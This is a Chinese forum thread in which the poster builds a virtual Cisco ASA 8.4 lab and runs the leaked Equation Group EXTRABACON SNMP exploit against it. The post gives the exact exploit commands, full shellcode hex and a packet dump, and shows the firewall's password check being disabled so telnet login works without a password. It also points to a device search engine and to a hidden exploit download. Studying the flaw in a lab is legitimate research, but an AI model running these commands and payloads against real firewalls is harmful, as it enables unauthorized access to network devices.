人=族 发表于 2016-9-26 12:11:18

Cisco(NSA方程式泄露) 附上exp地址

本帖最后由 人=族 于 2016-9-30 23:51 编辑

这几天在研究方程式泄露的EXTRABACON(EXBA)PoC, 网上没找到能成功的远程, 所以准备自己本地搭环境, 然后看到了这篇文章http://www.freebuf.com/vuls/112589.html这篇文章是在方程式信息泄露后看过的对我最有帮助的文章了, 不过尴尬的是, 文章中复现环境是Windows下使用VM, 可是我的环境却是Linux+VBox表示我的Windows都是用来打游戏的, 啥工具都没有, 仔细看了下文章, 准备去搜搜Linux+VBox的解决方案首先是虚拟机镜像文件这些东西: http://l.0x48.pw/blackhat/ASA-8.4.zip解压出来, 里面有个ASA-8.4.ovf, 可直接用VBox的import applicace导入虚拟机讲道理, 应该导入后就可以使用了, 但是没人跟你讲道理, 所以接下来要做两件事, 或者可以说是一件事 —— 配网络, 配网络就需要使用Serial口连进去.连接Serial口如下图所示:http://qn.lazysheep.cc/img/cisco1.png
基本默认就好, 重要的是Path/Address: /tmp/gns3_vbox/5d5928d1-3cb9-46c6-85cb-b7e1121f188c这个地址自己填一个, 要写到VBox可写目录, 所以选择了/tmp然后在Ubuntu下连接Serial口的工具我选择了minicom:
$ sudo apt install minicom
$ sudo vim /etc/minicom/minirc.dfl
pu port            unix#/tmp/gns3_vbox/5d5928d1-3cb9-46c6-85cb-b7e1121f188c
#后面跟的路径就是上面VBox的那个路径
然后就是启动虚拟机了, 不过在启动之前还有几个问题
如图:

http://qn.lazysheep.cc/img/cisco2.png
更大的那块硬盘要作为Master, 要设置成启动盘, 虚拟机导入后是500kb的那块是启动盘, 所以启动不起来

然后是网络, 自己测试就开一块网卡就够了, 然后我使用only-host, 如图:

然后是网络, 自己测试就开一块网卡就够了, 然后我使用only-host, 如图:
http://qn.lazysheep.cc/img/cisco3.png
http://qn.lazysheep.cc/img/cisco4.png
然后可以开机了开机后选择ASA 8.42 启动, 然后会停在Booting the kernel, 然后别等了, 你等再久也是这页面(我最开始摸索的时候傻傻的等了半小时), 现在就可以使用minicom去连接ASA的Serial口了
$ sudo minicom
然后等会就能进入防火墙的终端了

ciscoasa>en
Password:
ciscoasa#show run
......
interface GigabitEthernet0
shutdown
no nameif
no security-level
no ip address
!
......
查看配置会发现VBox的host-only配的DHCP对这防火墙并没有用, 所以只能配静态ip了

因为上面VBox host-only的网卡我配的是192.168.56.1, 所以防火墙我配个192.168.56.150

ciscoasa# conf ter
ciscoasa(config)#

***************************** NOTICE *****************************

Help to improve the ASA platform by enabling anonymous reporting,
which allows Cisco to securely receive minimal error and health
information from the device. To learn more about this feature,
please visit: http://www.cisco.com/go/smartcall

Would you like to enable anonymous error reporting to help improve
the product? es, o, sk later: y

Enabling anonymous reporting.
Adding "call-home reporting anonymous" to running configuration...
Creating trustpoint "_SmartCallHome_ServerCA" and installing certificate...

Trustpoint '_SmartCallHome_ServerCA' is a subordinate CA and holds a non self-s.

Trustpoint CA certificate accepted.

Please remember to save your configuration.

ciscoasa(config)# int G0
ciscoasa(config-if)# ip address 192.168.56.150 255.255.255.0
ciscoasa(config-if)# nameif inside
ciscoasa(config-if)# no shut
ciscoasa(config-if)# exit
ciscoasa(config)# exit
ciscoasa# show run
......
interface GigabitEthernet0
nameif inside
security-level 100
ip address 192.168.56.150 255.255.255.0
......
配置ip成功, 然后试着ping

ciscoasa# ping 192.168.56.1
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 192.168.56.1, timeout is 2 seconds:
?????
Success rate is 0 percent (0/5)
是GG的, 需要重启下

ciscoasa# copy running-config startup-config

Source filename ?
Cryptochecksum: 7ab821ac df1697e5 257673c1 49832288

5670 bytes copied in 0.20 secs
然后可以断电重启了(或者有没有像Linux上/etc/init.d/networking restart的程序? 并不懂, 所以采取了简单明了的硬重启)

然后ping本机查看网络是否通畅:

ciscoasa> ping 192.168.56.1
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 192.168.56.1, timeout is 2 seconds:
!!!!!
Success rate is 100 percent (5/5), round-trip min/avg/max = 1/1/1 ms
接下来就是开服务了, 根据漏洞描述, 防火墙需要开启ssh/telnet 和 snmp服务, 通过snmp的漏洞让ssh/telnet不需要密码即可登陆, 默认情况下, 这些服务器都是关闭的, 需要我们手动开始

# 开启telnet服务, 允许任何主机访问
ciscoasa(config)# telnet 0.0.0.0 0.0.0.0 inside
# 开始snmp服务, 允许192.168.56.1主机访问
ciscoasa(config)# snmp-server host inside 192.168.56.1 community public
检查是否成功开启

$ nmap 192.168.56.150 -p23 -Pn

Starting Nmap 7.01 ( https://nmap.org ) at 2016-09-01 14:34 CST
Nmap scan report for 192.168.56.150
Host is up (0.00024s latency).
PORT   STATE SERVICE
23/tcp opentelnet

Nmap done: 1 IP address (1 host up) scanned in 0.05 seconds

$ sudo nmap 192.168.56.150 -p161 -sU

Starting Nmap 7.01 ( https://nmap.org ) at 2016-09-01 14:36 CST
Nmap scan report for 192.168.56.150
Host is up (0.00020s latency).
PORT    STATE SERVICE
161/udp opensnmp
MAC Address: 08:00:27:89:2B:96 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.82 seconds
然后可以使用方程式泄露的PoC打打看:

$ python extrabacon_1.1.0.1.py info -t 192.168.56.150 -c public
WARNING: No route found for IPv6 destination :: (no default route?)
Logging to /EXPLOITS/EXBA/concernedparent
[+] Executing:extrabacon_1.1.0.1.py info -t 192.168.56.150 -c public
[+] probing target via snmp
[+] Connecting to 192.168.56.150:161
****************************************
[+] response:
###[ SNMP ]###
version   = <ASN1_INTEGER>
community = <ASN1_STRING['public']>
\PDU       \
   |###[ SNMPresponse ]###
   |id      = <ASN1_INTEGER>
   |error   = <ASN1_INTEGER>
   |error_index= <ASN1_INTEGER>
   |\varbindlist\
   |   |###[ SNMPvarbind ]###
   |   |oid       = <ASN1_OID['.1.3.6.1.2.1.1.1.0']>
   |   |value   = <ASN1_STRING['Cisco Adaptive Security Appliance Version 8.4(2)']>
   |   |###[ SNMPvarbind ]###
   |   |oid       = <ASN1_OID['.1.3.6.1.2.1.1.3.0']>
   |   |value   = <ASN1_TIME_TICKS>
   |   |###[ SNMPvarbind ]###
   |   |oid       = <ASN1_OID['.1.3.6.1.2.1.1.5.0']>
   |   |value   = <ASN1_STRING['ciscoasa']>

[+] firewall uptime is 93000 time ticks, or 0:15:30

[+] firewall name is ciscoasa

[+] target is running asa842, which is supported
Data stored in key file: asa842
Data stored in self.vinfo: ASA842

To check the key file to see if it really contains what we're claiming:
# cat /EXPLOITS/EXBA/keys/dc9d0q.key

To disable password checking on target:
# extrabacon_1.1.0.1.py exec -k dc9d0q -t 192.168.56.150 -c public --mode pass-disable

To enable password checking on target:
# extrabacon_1.1.0.1.py exec -k dc9d0q -t 192.168.56.150 -c public --mode pass-enable
第一步是主机信息探测, 接下来就是攻击了, 他的作用是可以无需密码使用telnet/ssh 连接防火墙:

$ telnet 192.168.56.150
Trying 192.168.56.150...
Connected to 192.168.56.150.
Escape character is '^]'.


User Access Verification

Password:
Password:
Password: Connection closed by foreign host.
先看没攻击前, 是没法连上的

$ pythonextrabacon_1.1.0.1.py exec -k dc9d0q -t 192.168.56.150 -c public --mode pass-disable
WARNING: No route found for IPv6 destination :: (no default route?)
Logging to /EXPLOITS/EXBA/concernedparent
[+] Executing:extrabacon_1.1.0.1.py exec -k dc9d0q -t 192.168.56.150 -c public --mode pass-disable
Data stored in self.vinfo: ASA842
[+] generating exploit for exec mode pass-disable
[+] using shellcode in ./versions
[+] importing version-specific shellcode shellcode_asa842
[+] building payload for mode pass-disable
appended PMCHECK_DISABLE payload bfa5a5a5a5b8d8a5a5a531f8bba525f6ac31fbb9a5b5a5a531f9baa2a5a5a531facd80eb14bff08f530931c9b104fcf3a4e90c0000005eebece8f8ffffff31c040c3
appended AAAADMINAUTH_DISABLE payload bfa5a5a5a5b8d8a5a5a531f8bba5b5adad31fbb9a5b5a5a531f9baa2a5a5a531facd80eb14bfe013080831c9b104fcf3a4e90c0000005eebece8f8ffffff31c040c3
[+] random SNMP request-id 527684062
[+] fixing offset to payload 50
overflow (112): 1.3.6.1.4.1.9.9.491.1.3.3.1.1.5.9.95.184.67.123.122.173.53.165.165.165.165.131.236.4.137.4.36.137.229.131.197.72.49.192.49.219.179.16.49.246.191.174.170.170.170.129.247.165.165.165.165.96.139.132.36.224.1.0.0.4.50.255.208.97.195.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.25.71.20.9.139.124.36.20.139.7.255.224.144
payload (133): bfa5a5a5a5b8d8a5a5a531f8bba525f6ac31fbb9a5b5a5a531f9baa2a5a5a531facd80eb14bff08f530931c9b104fcf3a4e90c0000005eebece8f8ffffff31c040c3bfa5a5a5a5b8d8a5a5a531f8bba5b5adad31fbb9a5b5a5a531f9baa2a5a5a531facd80eb14bfe013080831c9b104fcf3a4e90c0000005eebece8f8ffffff31c040c3c3
EXBA msg (370): 3082016e02010104067075626c6963a582015f02041f73d1de0201000201013082014f30819106072b060102010101048185bfa5a5a5a5b8d8a5a5a531f8bba525f6ac31fbb9a5b5a5a531f9baa2a5a5a531facd80eb14bff08f530931c9b104fcf3a4e90c0000005eebece8f8ffffff31c040c3bfa5a5a5a5b8d8a5a5a531f8bba5b5adad31fbb9a5b5a5a531f9baa2a5a5a531facd80eb14bfe013080831c9b104fcf3a4e90c0000005eebece8f8ffffff31c040c3c33081b80681b32b060104010909836b010303010105095f8138437b7a812d3581258125812581258103816c048109042481098165810381454831814031815b813310318176813f812e812a812a812a81018177812581258125812560810b81042481600100000432817f8150618143811081108110811081108110811081108110811081108110811081108110811081108110811081108110811081108110811081108110811019471409810b7c2414810b07817f816081100500
[+] Connecting to 192.168.56.150:161
[+] packet 1 of 1
[+] 0000   30 82 01 6E 02 01 01 0406 70 75 62 6C 69 63 A5   0..n.....public.
[+] 0010   82 01 5F 02 04 1F 73 D1DE 02 01 00 02 01 01 30   .._...s........0
[+] 0020   82 01 4F 30 81 91 06 072B 06 01 02 01 01 01 04   ..O0....+.......
[+] 0030   81 85 BF A5 A5 A5 A5 B8D8 A5 A5 A5 31 F8 BB A5   ............1...
[+] 0040   25 F6 AC 31 FB B9 A5 B5A5 A5 31 F9 BA A2 A5 A5   %..1......1.....
[+] 0050   A5 31 FA CD 80 EB 14 BFF0 8F 53 09 31 C9 B1 04   .1........S.1...
[+] 0060   FC F3 A4 E9 0C 00 00 005E EB EC E8 F8 FF FF FF   ........^.......
[+] 0070   31 C0 40 C3 BF A5 A5 A5A5 B8 D8 A5 A5 A5 31 F8   1.@...........1.
[+] 0080   BB A5 B5 AD AD 31 FB B9A5 B5 A5 A5 31 F9 BA A2   .....1......1...
[+] 0090   A5 A5 A5 31 FA CD 80 EB14 BF E0 13 08 08 31 C9   ...1..........1.
[+] 00a0   B1 04 FC F3 A4 E9 0C 0000 00 5E EB EC E8 F8 FF   ..........^.....
[+] 00b0   FF FF 31 C0 40 C3 C3 3081 B8 06 81 B3 2B 06 01   ..1.@..0.....+..
[+] 00c0   04 01 09 09 83 6B 01 0303 01 01 05 09 5F 81 38   .....k......._.8
[+] 00d0   43 7B 7A 81 2D 35 81 2581 25 81 25 81 25 81 03   C{z.-5.%.%.%.%..
[+] 00e0   81 6C 04 81 09 04 24 8109 81 65 81 03 81 45 48   .l....$...e...EH
[+] 00f0   31 81 40 31 81 5B 81 3310 31 81 76 81 3F 81 2E   1.@1.[.3.1.v.?..
[+] 0100   81 2A 81 2A 81 2A 81 0181 77 81 25 81 25 81 25   .*.*.*...w.%.%.%
[+] 0110   81 25 60 81 0B 81 04 2481 60 01 00 00 04 32 81   .%`....$.`....2.
[+] 0120   7F 81 50 61 81 43 81 1081 10 81 10 81 10 81 10   ..Pa.C..........
[+] 0130   81 10 81 10 81 10 81 1081 10 81 10 81 10 81 10   ................
[+] 0140   81 10 81 10 81 10 81 1081 10 81 10 81 10 81 10   ................
[+] 0150   81 10 81 10 81 10 81 1081 10 81 10 81 10 19 47   ...............G
[+] 0160   14 09 81 0B 7C 24 14 810B 07 81 7F 81 60 81 10   ....|$.......`..
[+] 0170   05 00                                              ..
****************************************
[+] response:
###[ SNMP ]###
version   = <ASN1_INTEGER>
community = <ASN1_STRING['public']>
\PDU       \
   |###[ SNMPresponse ]###
   |id      = <ASN1_INTEGER>
   |error   = <ASN1_INTEGER>
   |error_index= <ASN1_INTEGER>
   |\varbindlist\
   |   |###[ SNMPvarbind ]###
   |   |oid       = <ASN1_OID['.1.3.6.1.2.1.1.1.0']>
   |   |value   = <ASN1_STRING['Cisco Adaptive Security Appliance Version 8.4(2)']>
   |   |###[ SNMPvarbind ]###
   |   |oid       = <ASN1_OID['.1.3.6.1.4.1.99.12.36.1.1.1.116.114.97.112.104.111.115.116.46.112.117.98.108.105.99.46.49.57.50.46.49.54.56.46.53.54.46.49.46.50']>
   |   |value   = <ASN1_STRING['']>
[+] received SNMP id 527684062, matches random id sent, likely success
[+] clean return detected
然后使用telnet登陆看看

$ telnet 192.168.56.150
Trying 192.168.56.150...
Connected to 192.168.56.150.
Escape character is '^]'.


User Access Verification

Password:
Type help or '?' for a list of available commands.
ciscoasa> en
Password:
ciscoasa# conf ter
ciscoasa(config)#
攻击成功
从上面环境搭建的过程我们来简单的分析下这漏洞的情况

必须开启snmp服务和ssh/telnet, 而防火墙默认是关闭的
snmp服务开启是使用白名单, 而且只能指定单个ip而不能指定整个网段
ciscoasa(config)# snmp-server host inside 0.0.0.0 community public
ERROR: Not a valid host address - 0.0.0.0
ciscoasa(config)# snmp-server host inside 192.168.56.0 community public
$ sudo nmap 192.168.56.150 -p161 -sU

Starting Nmap 7.01 ( https://nmap.org ) at 2016-09-01 15:07 CST
Nmap scan report for 192.168.56.150
Host is up (0.00018s latency).
PORT    STATE         SERVICE
161/udp open|filtered snmp
MAC Address: 08:00:27:89:2B:96 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.85 seconds
ciscoasa(config)# snmp-server host inside 192.168.56.0 255.255.255.0 community$

snmp-server host inside 192.168.56.0 255.255.255.0 community public
                                     ^
ERROR: % Invalid input detected at '^' marker.
ciscoasa(config)# snmp-server host inside 192.168.56.0/24 community public
                                                      ^
ERROR: % Invalid input detected at '^' marker.
可以看出, 因为不允许设置子网掩码, 所以根本没法输入网络地址, 只能输入单个ip

snmp的community认证问题, public为我们设置的认证字符串, 比如我们改一改
ciscoasa(config)# snmp-server host inside 192.168.56.1 community public-test
$ python extrabacon_1.1.0.1.py info -t 192.168.56.150 -c public
WARNING: No route found for IPv6 destination :: (no default route?)
Logging to /EXPLOITS/EXBA/concernedparent
[+] Executing:extrabacon_1.1.0.1.py info -t 192.168.56.150 -c public
[+] probing target via snmp
[+] Connecting to 192.168.56.150:161
****************************************
Traceback (most recent call last):
$ python extrabacon_1.1.0.1.py info -t 192.168.56.150 -c public-test
WARNING: No route found for IPv6 destination :: (no default route?)
Logging to /EXPLOITS/EXBA/concernedparent
[+] Executing:extrabacon_1.1.0.1.py info -t 192.168.56.150 -c public-test
[+] probing target via snmp
[+] Connecting to 192.168.56.150:161
****************************************
[+] response:
###[ SNMP ]###
version   = <ASN1_INTEGER>
community = <ASN1_STRING['public-test']>
\PDU       \
   |###[ SNMPresponse ]###
   |id      = <ASN1_INTEGER>
   |error   = <ASN1_INTEGER>
   |error_index= <ASN1_INTEGER>
   |\varbindlist\
   |   |###[ SNMPvarbind ]###
   |   |oid       = <ASN1_OID['.1.3.6.1.2.1.1.1.0']>
   |   |value   = <ASN1_STRING['Cisco Adaptive Security Appliance Version 8.4(2)']>
   |   |###[ SNMPvarbind ]###
   |   |oid       = <ASN1_OID['.1.3.6.1.2.1.1.3.0']>
   |   |value   = <ASN1_TIME_TICKS>
   |   |###[ SNMPvarbind ]###
   |   |oid       = <ASN1_OID['.1.3.6.1.2.1.1.5.0']>
   |   |value   = <ASN1_STRING['ciscoasa']>

[+] firewall uptime is 150100 time ticks, or 0:25:01

[+] firewall name is ciscoasa

[+] target is running asa842, which is supported
Data stored in key file: asa842
Data stored in self.vinfo: ASA842

To check the key file to see if it really contains what we're claiming:
# cat /EXPLOITS/EXBA/keys/OpezI1.key

To disable password checking on target:
# extrabacon_1.1.0.1.py exec -k OpezI1 -t 192.168.56.150 -c public-test --mode pass-disable

To enable password checking on target:
在密码不对的情况下snmp根本连不上上述三种条件, 导致了该漏洞是非常鸡肋的RCE, 首先你需要能访问SNMP, 访问SNMP需要你在防火墙的白名单中, 然后还要知道Community认证的密码.

搜索神器 : https://www.zoomeye.org

exp工具 : **** Hidden Message *****


90_ 发表于 2016-9-26 18:05:22

看的我头疼,不会用代码标签吗?

H.U.C-Star 发表于 2016-9-26 21:21:32

吊炸天,不能由浅入深吗?一言不合甩你30币!

年轻的小老头儿 发表于 2016-10-19 13:48:10

谢谢楼主分享

庐阳小马 发表于 2017-1-12 09:52:02

看的累死了,脑仁疼
页: [1]
查看完整版本: Cisco(NSA方程式泄露) 附上exp地址